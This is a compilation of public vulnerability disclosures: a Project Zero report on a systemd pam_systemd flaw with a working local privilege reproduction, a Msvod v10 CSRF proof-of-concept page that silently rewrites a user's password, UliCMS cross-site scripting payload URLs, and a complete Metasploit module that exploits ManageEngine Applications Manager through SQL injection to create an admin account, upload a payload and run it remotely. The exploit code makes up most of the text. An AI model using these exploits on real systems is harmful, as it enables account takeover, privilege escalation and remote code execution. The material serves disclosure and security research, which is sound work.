systemd-logind is informed about the creation of new sessions by the PAM
module pam_systemd through a systemd message bus call from
pam_sm_open_session() to method_create_session(). The RPC method trusts the
information supplied to it, apart from some consistency checks; that is not
directly a problem, since this RPC method can only be invoked by root.
This means that the PAM module needs to ensure that it doesn't pass incorrect
data to systemd-logind.

Looking at the code in the PAM module, however, you can see that the seat name
of the session and the virtual terminal number come from environment
variables:

seat = getenv_harder(handle, "XDG_SEAT", NULL);
cvtnr = getenv_harder(handle, "XDG_VTNR", NULL);
type = getenv_harder(handle, "XDG_SESSION_TYPE", type_pam);
class = getenv_harder(handle, "XDG_SESSION_CLASS", class_pam);
desktop = getenv_harder(handle, "XDG_SESSION_DESKTOP", desktop_pam);

This is actually documented at
<https://www.freedesktop.org/software/systemd/man/pam_systemd.html#Environment>.

After some fixup logic that is irrelevant here, this data is then passed to
the RPC method.


One quirk of this issue is that a new session is only created if the calling
process is not already part of a session (based on the cgroups it is in,
parsed from procfs). This means that an attacker can't simply ssh into a
machine, set some environment variables, and then invoke a setuid binary that
uses PAM (such as "su") because ssh already triggers creation of a session via
PAM. But as it turns out, the systemd PAM module is only invoked for
interactive sessions:

# cat /usr/share/pam-configs/systemd
Name: Register user sessions in the systemd control group hierarchy
Default: yes
Priority: 0
Session-Interactive-Only: yes
Session-Type: Additional
Session:
optional pam_systemd.so

So, under the following assumptions:

- we can run commands on the remote machine, e.g. via SSH
- our account can be used with "su" (it has a password and isn't disabled)
- the machine has no X server running and is currently displaying tty1, with
a login prompt

we can have our actions checked against the "allow_active" policies instead of
the "allow_any" policies as follows:

- SSH into the machine
- use "at" to schedule a job in one minute that does the following:
* wipe the environment
* set XDG_SEAT=seat0 and XDG_VTNR=1
* use "expect" to run "su -c {...} {our_username}" and enter our user's
password
* in the shell invoked by "su", perform the action we want to run under the
"allow_active" policy


I tested this in a Debian 10 VM, as follows ("{{{...}}}" have been replaced),
after ensuring that no sessions are active and the VM's screen is showing the
login prompt on tty1; all following commands are executed over SSH:


=====================================================================
normal_user@deb10:~$ cat session_outer.sh
#!/bin/sh
echo "===== OUTER TESTING PKCON">/tmp/atjob.log
pkcon refresh -p </dev/null >>/tmp/atjob.log
env -i /home/normal_user/session_middle.sh
normal_user@deb10:~$ cat session_middle.sh
#!/bin/sh
export XDG_SEAT=seat0
export XDG_VTNR=1

echo "===== ENV DUMP =====">/tmp/atjob.log
env >> /tmp/atjob.log

echo "===== SESSION_OUTER =====">> /tmp/atjob.log
cat /proc/self/cgroup >> /tmp/atjob.log

echo "===== OUTER LOGIN STATE =====">> /tmp/atjob.log
loginctl --no-ask-password >> /tmp/atjob.log

echo "===== MIDDLE TESTING PKCON">>/tmp/atjob.log
pkcon refresh -p </dev/null >>/tmp/atjob.log

/home/normal_user/runsu.expect

echo "=========================">> /tmp/atjob.log
normal_user@deb10:~$ cat runsu.expect
#!/usr/bin/expect
spawn /bin/su -c "/home/normal_user/session_inner.sh" normal_user
expect "Password: "
send \"{{{PASSWORD}}}\
\"
expect eof

normal_user@deb10:~$ cat session_inner.sh
#!/bin/sh
echo "===== INNER LOGIN STATE =====">> /tmp/atjob.log
loginctl --no-ask-password >> /tmp/atjob.log

echo "===== SESSION_INNER =====">> /tmp/atjob.log
cat /proc/self/cgroup >> /tmp/atjob.log

echo "===== INNER TESTING PKCON">>/tmp/atjob.log
pkcon refresh -p </dev/null >>/tmp/atjob.log

normal_user@deb10:~$ loginctl
SESSION UID USER SEAT TTY
7 1001 normal_user pts/0

1 sessions listed.
normal_user@deb10:~$ pkcon refresh -p </dev/null
Transaction:	Refreshing cache
Status: 	Waiting in queue
Status: 	Waiting for authentication
Status: 	Finished
Results:
Fatal error: Failed to obtain authentication.
normal_user@deb10:~$ at -f /home/normal_user/session_outer.sh {{{TIME}}}
warning: commands will be executed using /bin/sh
job 25 at {{{TIME}}}
{{{ wait here until specified time has been reached, plus time for the job to finish running}}}
normal_user@deb10:~$ cat /tmp/atjob.log
===== ENV DUMP =====
XDG_SEAT=seat0
XDG_VTNR=1
PWD=/home/normal_user
===== SESSION_OUTER =====
10:memory:/system.slice/atd.service
9:freezer:/
8:pids:/system.slice/atd.service
7:perf_event:/
6:devices:/system.slice/atd.service
5:net_cls,net_prio:/
4:cpuset:/
3:blkio:/
2:cpu,cpuacct:/
1:name=systemd:/system.slice/atd.service
0::/system.slice/atd.service
===== OUTER LOGIN STATE =====
SESSION UID USER SEAT TTY
7 1001 normal_user pts/0

1 sessions listed.
===== MIDDLE TESTING PKCON
Transaction:	Refreshing cache
Status: 	Waiting in queue
Status: 	Waiting for authentication
Status: 	Finished
Results:
Fatal error: Failed to obtain authentication.
===== INNER LOGIN STATE =====
SESSION UID USER SEAT TTY
18 1001 normal_user seat0 pts/1
7 1001 normal_user pts/0

2 sessions listed.
===== SESSION_INNER =====
10:memory:/user.slice/user-1001.slice/session-18.scope
9:freezer:/
8:pids:/user.slice/user-1001.slice/session-18.scope
7:perf_event:/
6:devices:/user.slice
5:net_cls,net_prio:/
4:cpuset:/
3:blkio:/
2:cpu,cpuacct:/
1:name=systemd:/user.slice/user-1001.slice/session-18.scope
0::/user.slice/user-1001.slice/session-18.scope
===== INNER TESTING PKCON
Transaction:	Refreshing cache
Status: 	Waiting in queue
Status: 	Waiting for authentication
Status: 	Waiting in queue
Status: 	Starting
Status: 	Loading cache
Percentage:	0
Percentage:	50
Percentage:	100
Percentage:	0
Percentage:	50
Percentage:	100
Status: 	Refreshing software list
Status: 	Downloading packages
Percentage:	0
Status: 	Running
Status: 	Loading cache
Percentage:	100
Status: 	Finished
Results:
Enabled http://ftp.ch.debian.org/debian buster InRelease
Enabled http://security.debian.org/debian-security buster/updates InRelease
Enabled http://debug.mirrors.debian.org/debian-debug buster-debug InRelease
=========================
You have new mail in /var/mail/normal_user
normal_user@deb10:~$
=====================================================================


This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available (whichever is earlier), the bug
report will become visible to the public.


Found by: jannh@google.com


Msvod 10 Cross Site Request Forgery


Msvod version 10 suffers from a cross site request forgery vulnerability.


MD5 | d972ae68cb7542369b38870ac066ac54

# Exploit Title: Msvod v10 has a CSRF vulnerability to change user information

# Date: 2019-04-14
# Exploit Author: ax8
# Vendor Homepage: https://github.com/Li-Siyuan
# Software Link: https://www.msvodx.com/
# Version: v10
# CVE : CVE-2019-11375



Msvod v10 has a CSRF vulnerability to change user information via the admin/member/edit.html URI.



<!--poc.html(change user infomation)-->

<!DOCTYPE html>

<html>

<head>

<title> CSRF Proof</title>

<script type="text/javascript">

// Submits the hidden form as soon as the page loads; no user interaction needed.
function exec1(){

document.getElementById('form1').submit();

}

</script>

</head>

<body onload="exec1();">

<!-- Forged POST to the admin member-edit endpoint. The hidden fields mirror
the fields the application's own form sends; none of them is an anti-CSRF
token, which (per the advisory) is what makes the request forgeable. Host and
values are the author's test data. -->
<form id="form1" action="http://a.msvodx.cn/admin/member/edit.html" method="POST">

<input type="hidden" name="username" value="hacker1" />

<input type="hidden" name="nickname" value="hacker1" />

<input type="hidden" name="email" value="hacker1" />

<input type="hidden" name="tel" value="hacker1" />

<input type="hidden" name="password" value="hacker1" />

<input type="hidden" name="out_time" value="1970-01-01" />

<input type="hidden" name="money" value="30" />

<input type="hidden" name="is_permanent" value="0" />

<input type="hidden" name="status" value="1" />

<!-- identifier of the member record being modified -->
<input type="hidden" name="id" value="821" />

</form>

</body>

</html>

MISC:http://www.iwantacve.cn/index.php/archives/198/

UliCMS 2019.2 / 2019.1 Cross Site Scripting


UliCMS versions 2019.2 and 2019.1 suffer from multiple cross site scripting vulnerabilities.


MD5 | f13c01a732277faca5b7d15c6c7fb9ac

# Exploit Title: UliCMS - 2019.2 , 2019.1 - Multiple Cross-Site Scripting
# Google Dork: intext:"by UliCMS"
# Exploit Author: Kağan EĞLENCE
# Vendor Homepage: https://en.ulicms.de/
# Version: 2019.2 , 2019.1
# CVE : CVE-2019-11398

### Vulnerability 1

Url : http://localhost/ulicms/ulicms/admin/index.php?go=test%27%20accesskey=%27X%27%20onclick=%27alert(1)
Vulnerable File : /ulicms/admin/inc/loginform.php
Request Type: GET
Vulnerable Parameter : "go"
Payload: test%27%20accesskey=%27X%27%20onclick=%27alert(1)

Result : <input type="hidden" name="go" value='asd' accesskey='X'
onclick='alert(1)'>

### Vulnerability 2

Url : http://localhost/ulicms/ulicms/admin/index.php?register=register&go=test%27%20accesskey=%27X%27%20onclick=%27alert(1)
Vulnerable File : /ulicms/admin/inc/registerform.php
Request Type: GET
Vulnerable Parameter : "go"
Payload : register=register&go=asd%27%20accesskey=%27X%27%20onclick=%27alert(1)

Result : <input type="hidden" name="go" value='asd' accesskey='X'
onclick='alert(1)'>

### Vulnerability 3 - Authenticated

Url : http://localhost/ulicms/ulicms/admin/index.php?action=favicon&error=%3Cscript%3Ealert(1)%3C/script%3E
Request Type: GET
Vulnerable Parameter : "error"
Payload : action=favicon&error=%3Cscript%3Ealert(1)%3C/script%3E

### History
=============
2019-04-13 Issue discovered
2019-04-13 Vendor contacted
2019-04-13 Vendor response and hotfix
2019-04-14 Vendor releases fixed versions
2019-04-22 Advisory release

ManageEngine Applications Manager 14.0 SQL Injection / Command Injection


This Metasploit module exploits SQL injection and command injection vulnerabilities in ManageEngine AM versions 14 and below.


MD5 | f94429a86b4ffe842922471acd27d88a

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Reviewer notes (derived only from the code below):
#
# Request sequence, in execution order:
#   check  -> use_sqli: two unauthenticated POSTs to jsp/FaultTemplateOptions.jsp whose
#             'resourceid' value is "1" followed by INSERT statements targeting
#             AM_UserPasswordTable and AM_UserGroupTable (one PostgreSQL variant, one MSSQL variant).
#   check  -> GET applications.do, then POST j_security_check with the inserted credentials.
#   exploit -> check_platform: GET showTile.do?TileName=.ExecProg, scrapes execProgExecDir.
#   file_up -> multipart POST to Upload.do storing the payload under a random file name.
#   create_exec_prog -> POST adminAction.do (method=createExecProgAction), then
#   exec   -> GET common/executeScript.do (method=testAction) with the scraped actionID.
#
# Artifacts left on the target, useful for incident response: the inserted account
# (random 6-letter lowercase username, ADMIN group), the uploaded script in the
# execProgExecDir directory, and an "Execute Program" action with a random 7-character
# display name. Nothing below removes any of them; FileDropper is mixed in but
# register_file_for_cleanup is never called.
#
# Note also that `check` is not side-effect free: it performs the injection and creates
# the account before returning a CheckCode.
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper # included, but no cleanup registration appears in this module

# Module metadata. Two targets are declared, both ARCH_CMD: Windows (payload written as a .bat)
# and Linux/Unix (payload written as .sh/.pl/.py/.rb, chosen in file_up). DefaultTarget is 1 (Linux).
def initialize(info={})
super(update_info(info,
'Name' => "ManageEngine Applications Manager < 14.0 - Authentication Bypass / Remote Command Execution",
'Description' => %q(
This module exploits sqli and command injection vulnerability in the ManageEngine AM 14 and prior versions.
It is completely different from the previous EDB-ID:46725 exploit.

Module creates a new admin user with SQLi (MSSQL/PostgreSQL) and provides authentication bypass.
Therefore an unauthenticated user can gain the authority of "system" on the server.
It uploads malicious file using the "Execute Program Action(s)" feature of the app with the new admin account.

Tested: Applications Manager 14 on Linux 64-bit (PostgreSQL)
Applications Manager 14 on Windows 10 64-bit (MSSQL)
Applications Manager 14 on Windows 10 64-bit (PostgreSQL)
Applications Manager 13 on Windows Server 2012 R2 64-bit (MSSQL)
Applications Manager 12 on Windows Server 2012 R2 64-bit (PostgreSQL)
),
'License' => MSF_LICENSE,
'Author' =>
[
'AkkuS <Özkan Mustafa Akkuş>', # Discovery & PoC & Metasploit module @ehakkus
],
'References' =>
[
[ 'URL', 'http://pentest.com.tr/exploits/ManageEngine-App-Manager-14-Auth-Bypass-Remote-Command-Execution.html' ]
],
'DefaultOptions' =>
{
# The created action is run by the application itself, so the session may arrive late;
# the handler is given a longer wait (presumably the session wait delay — confirm against the framework docs).
'WfsDelay' => 60, # countermeasure
'RPORT' => 8443,
'SSL' => true
},
'Privileged' => true,
'Payload' =>
{
'DisableNops' => true,
},
'Platform' => ['unix', 'win', 'linux'],
'Targets' =>
[
[ 'Windows Target',
{
'Platform' => ['win'],
'Arch' => ARCH_CMD,
}
],
[ 'Linux Target',
{
'Platform' => ['unix','linux'],
'Arch' => ARCH_CMD,
'Payload' =>
{
'Compat' =>
{
'PayloadType' => 'cmd',
# file_up maps the payload text to a file extension via regex, so only
# these interpreter families are accepted for the Linux target.
'RequiredCmd' => 'generic perl ruby python',
}
}
}
]
],
'DisclosureDate' => '22 April 2019',
'DefaultTarget' => 1))

# TARGETURI is the application's base path; every URI below is built relative to it.
# NOTE(review): the trailing `self.class` argument is the legacy owner parameter — verify it is
# still accepted by the framework version in use.
register_options(
[
OptString.new('TARGETURI', [true, 'The path of ME', '/'])
],self.class)
end

# Scheme/host/port string used as a prefix by the print_* overrides below.
# @return [String] e.g. "https://host:8443" (constructed example)
def peer
"#{ssl ? 'https://' : 'http://' }#{rhost}:#{rport}"
end

# Prefix status output with the peer address.
def print_status(msg='')
super("#{peer} - #{msg}")
end

# Prefix error output with the peer address.
def print_error(msg='')
super("#{peer} - #{msg}")
end

# Prefix success output with the peer address.
def print_good(msg='')
super("#{peer} - #{msg}")
end

# Triggers the "Execute Program" action that create_exec_prog created, using the
# authenticated session cookie in @cookie.
#
# @param action [String] the actionID scraped from the createExecProgAction response
# @return [Rex::Proto::Http::Response, nil] the HTTP response; it is not inspected,
#   so a failed trigger is only noticed when no session arrives
def exec(action)
# operation of malicious file. The end of the adventure :(
send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'common', 'executeScript.do'),
'cookie' => @cookie,
'vars_get' => {
'method' => 'testAction',
'actionID' => action,
'haid' => 'null'
}
)
end
##
# platform check
#
# Loads the ".ExecProg" tile as the new admin and reads the execProgExecDir form value.
# The platform is inferred from that directory string alone: a ':' (drive letter) means
# Windows, anything else is treated as Unix. Sets @dir and hands off to file_up.
#
# NOTE(review): if the 'execProgExecDir' marker is missing from the body, split(...)[1]
# is nil and the chained .split raises NoMethodError instead of reaching fail_with.
##
def check_platform
# First touch to support of execute program ;)
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'showTile.do'),
'cookie' => @cookie,
'vars_get' => {
'TileName' => '.ExecProg',
'haid' => 'null',
}
)
if res && res.code == 200 && res.body.include?('createExecProgAction')
# Platform can be discovered precisely using an application dir.
@dir = res.body.split('name="execProgExecDir" maxlength="200" size="40" value="')[1].split('" class=')[0] # It will be recalled later
if @dir =~ /:/
platform = Msf::Module::Platform::Windows
else
platform = Msf::Module::Platform::Unix
end
else
fail_with(Failure::Unreachable, 'Connection error occurred! DIR could not be detected.')
end
file_up(platform, @dir)
end
##
# Creating and sending malicious files
#
# Picks a file extension for the payload and uploads it via a multipart POST to Upload.do
# (uploadDir "./", field "theFile"). On success @fname holds the stored file name
# (9-11 random letters plus the extension) and create_exec_prog is called.
#
# @param platform [Class] Msf::Module::Platform::Windows or ::Unix, from check_platform
# @param dir [String] the execProgExecDir value scraped by check_platform
#
# NOTE(review): the extension is chosen by matching the payload text in order
# /sh/, /perl/, /python/, /ruby/; because /sh/ is tested first, any non-shell payload whose
# command text happens to contain "sh" is written with a ".sh" extension.
##
def file_up(platform, dir)
# specifying an extension by platform
if platform == Msf::Module::Platform::Windows
filex = ".bat"
else
if payload.encoded =~ /sh/
filex = ".sh"
elsif payload.encoded =~ /perl/
filex = ".pl"
elsif payload.encoded =~ /python/
filex = ".py"
elsif payload.encoded =~ /ruby/
filex = ".rb"
else
fail_with(Failure::Unknown, 'Payload type could not be checked!')
end
end

@fname= rand_text_alpha(9 + rand(3)) + filex
data = Rex::MIME::Message.new
data.add_part('./', nil, nil, 'form-data; name="uploadDir"')
data.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"theFile\"; filename=\"#{@fname}\"")

res = send_request_cgi({
'method' => 'POST',
'data' => data.to_s,
'agent' => 'Mozilla',
'ctype' => "multipart/form-data; boundary=#{data.bound}",
'cookie' => @cookie,
'uri' => normalize_uri(target_uri, "Upload.do")
})

if res && res.code == 200 && res.body.include?('icon_message_success') # Success icon control
print_good("#{@fname} malicious file has been uploaded.")
create_exec_prog(dir, @fname) # Great. Let's send them somewhere else o_O
else
fail_with(Failure::Unknown, 'The file could not be uploaded!')
end
end

# Registers an "Execute Program" action (adminAction.do, method=createExecProgAction) that runs
# `fname` from `dir` on the local host, then scrapes the new actionid from the response and
# passes it to exec. The display name (@display) is 7 random alphanumerics.
#
# @param dir [String] working directory for the action (execProgExecDir)
# @param fname [String] the uploaded file name to run
#
# NOTE(review): as in check_platform, split('actionid=')[1] is nil when the marker is absent
# and the following .split raises NoMethodError rather than reaching fail_with.
def create_exec_prog(dir, fname)

@display = rand_text_alphanumeric(7)
res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'adminAction.do'),
'cookie' => @cookie,
'vars_post' => {
'actions' => '/showTile.do?TileName=.ExecProg&haid=null',
'method' => 'createExecProgAction',
'id' => 0,
'displayname' => @display,
'serversite' => 'local',
'choosehost' => -2,
'abortafter' => 5, # I think it would be enough for once. But I gave 5 O_o
'command' => fname,
'execProgExecDir' => dir,
'cancel' => 'false'
}
)

if res && res.code == 200 && res.body.include?('icon_message_success') # Success icon control
# Find actionID simply from body res
actionid = res.body.split('actionid=')[1].split("','710','350','250','200')")[0]
print_status("Transactions completed. Attempting to get a session...")
exec(actionid)
else
fail_with(Failure::Unreachable, 'Connection error occurred!')
end

end
##
# Check all
#
# Builds one PostgreSQL and one MSSQL INSERT pair that add a user (@uname / @pwd, password
# stored as an MD5 hex digest) to AM_UserPasswordTable and put it in the ADMIN group in
# AM_UserGroupTable, sends both through use_sqli, then verifies by logging in through
# j_security_check. On success @cookie holds the authenticated session.
#
# @return [Exploit::CheckCode] Vulnerable when the login redirect is observed, otherwise Safe
#
# This method mutates the target (account creation) before it reports a result, so it does
# not behave like a passive check; the account is not removed afterwards.
##
def check
# Instead of detecting the database type, we can guarantee the vuln by sending a separate query to both.
# The platform can be linux and possible remotely connected to the MSSQL database.
# In the same way platform can be windows and postgresql can be used.
# Thats why we are sending two queries. We will check the platform inside.
@uname = Rex::Text.rand_text_alpha_lower(6)
uid = rand_text_numeric(3)
apk = rand_text_numeric(6)
@pwd = rand_text_alphanumeric(8+rand(9))
# MSSQL injection should be prepared with ASCII characters.
# Map and join can be used for this.
# (The surrounding "#{...}" interpolation is redundant; the join already yields a String.)
@uidCHR = "#{uid.unpack('c*').map{|c| "CHAR(#{c})" }.join('+')}"
@unameCHR = "#{@uname.unpack('c*').map{|c| "CHAR(#{c})" }.join('+')}"
@apkCHR = "#{apk.unpack('c*').map{|c| "CHAR(#{c})" }.join('+')}"
@adm = "CHAR(65)+CHAR(68)+CHAR(77)+CHAR(73)+CHAR(78)" # "ADMIN" CHARs - should not be random
# PostgreSQL injection query // no need APIKEY
# Uses $$...$$ dollar quoting and '+' as the URL-encoded space; use_sqli sends this body raw.
pg_user =""
pg_user << "1;insert+into+AM_UserPasswordTable+(userid,username,password)+values+"
pg_user << "($$#{uid}$$,$$#{@uname}$$,$$#{Rex::Text.md5(@pwd)}$$);"
pg_user << "insert+into+Am_UserGroupTable+(username,groupname)+values+($$#{@uname}$$,$$ADMIN$$);--+"
# MSSQL injection query
# Strings are built from CHAR() concatenations; the password hash is passed as a 0x hex literal.
ms_user =""
ms_user << "1 INSERT INTO AM_UserPasswordTable(userid,username,password,apikey) values (#{@uidCHR},"
ms_user << " #{@unameCHR}, 0x#{Rex::Text.md5(@pwd)}, #{@apkCHR});"
ms_user << "INSERT INTO AM_UserGroupTable(username,groupname) values (#{@unameCHR}, #{@adm})--"
# Send SQL queries to both types of database(PostreSQL,MSSQL) with SQLi vuln..
use_sqli(ms_user, pg_user)

res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'applications.do'),
)
# If the user we sent with queries was created, the login will be successful with new admin user.
if res && res.code == 200 && res.body.include?('.loginDiv') # css control makes more sense. The application language may not be English.
@cookie = res.get_cookies
res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'j_security_check'),
'cookie' => @cookie,
'vars_post' => {
'clienttype' => 'html',
'j_username' => @uname,
'j_password' => @pwd
}
)

if res && res.code == 302 && res.body.include?('Redirecting to')
# Follow up with a GET so the post-login cookies are captured.
# NOTE(review): res is not nil-checked here, so a dropped connection raises on get_cookies.
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'applications.do'),
'cookie' => @cookie
)
@cookie = res.get_cookies # last cookie
return Exploit::CheckCode::Vulnerable
else
return Exploit::CheckCode::Safe
end
else
return Exploit::CheckCode::Safe
end

end

# Entry point: runs check (which performs the injection and login), prints the created
# credentials, then continues with check_platform -> file_up -> create_exec_prog -> exec.
def exploit
unless Exploit::CheckCode::Vulnerable == check
fail_with(Failure::NotVulnerable, 'Target is not vulnerable.')
end
print_good("Excellent! Logged in as #{@uname}")
print_status("Admin Username => #{@uname}")
print_status("Admin Password => #{@pwd}")
check_platform # Start the adventure
end
##
# Communication with the database
#
# Sends both injection strings, unauthenticated, to jsp/FaultTemplateOptions.jsp in the
# 'resourceid' parameter. Neither response is inspected; success is only established later
# by the login attempt in check.
#
# @param mssql [String] MSSQL variant, sent through vars_post (framework-encoded)
# @param postgresql [String] PostgreSQL variant, sent as a raw pre-encoded body so the
#   '+' and '$$' characters reach the server unchanged; the trailing 25 is the request timeout
#
# For log review: both requests are POSTs to this JSP whose resourceid value starts with "1"
# followed by INSERT statements, which a normal client never sends.
##
def use_sqli(mssql, postgresql)
# two different post data must be sent.
# Because the query structures are different.
send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'jsp', 'FaultTemplateOptions.jsp'),
'vars_post' => {
'resourceid' => mssql
}
)
# important to send the +/$ characters clear
send_request_cgi(
{
'method' => 'POST',
'ctype' => 'application/x-www-form-urlencoded',
'uri' => normalize_uri(target_uri.path, 'jsp', 'FaultTemplateOptions.jsp'),
'data' => "resourceid=#{postgresql}"
}, 25)

end
end
##
# The end of the codes (o_O) // AkkuS
##
